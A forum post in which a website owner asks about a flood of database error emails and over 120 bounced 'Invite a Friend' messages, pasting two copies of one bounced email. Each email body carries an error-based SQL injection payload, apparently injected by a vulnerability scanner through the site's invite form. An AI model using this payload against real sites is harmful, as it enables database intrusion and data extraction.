Yesterday I was getting a ton of database error emails, I couldn't decipher them. Today I found over 120 returned emails, and the code at the bottom of the emails was in some of the database errors. Has anyone experienced something like this?
To: netsparker@example.com
Subject: =?UTF-8?B?
SW52aXRlIGEgRnJpZW5k?=
Content-type: text/html; charset=UTF-8
MIME-Version: 1.0
From: =?UTF-8?B?QmlrZXIgVW5pdHk=?= <admin@xxxxxx.com>
Message-Id: <E1TbFcT-0004eg-O1@myhostingcompany.com>
Date: Wed, 21 Nov 2012 14:05:57 -0500
<html><head></head><body style="font: 12px Verdana; color:#000000">
<p><b>Hello</b>,</p>
<p>I surfed the web and found a cool site: <a href="http://www.xxxxxx.com/">http://www.xxxxxxx.com/</a><br />
I thought it might be interesting to you.</p>
<p><span style="color:#FF6633">-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1</span></p></body></html>
Content-type: text/html; charset=UTF-8
MIME-Version: 1.0
From: =?UTF-8?B?QmlrZXIgVW5pdHk=?= <admin@xxxxxx.com>
Message-Id: <E1TbFcT-0004eg-O1@myhostingcompany.com>
Date: Wed, 21 Nov 2012 14:05:57 -0500
<html><head></head><body style="font: 12px Verdana; color:#000000">
<p><b>Hello</b>,</p>
<p>I surfed the web and found a cool site: <a href="http://www.xxxxxx.com/">http://www.xxxxxxx.com/</a><br />
I thought it might be interesting to you.</p>
<p><span style="color:#FF6633">-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1</span></p></body></html>
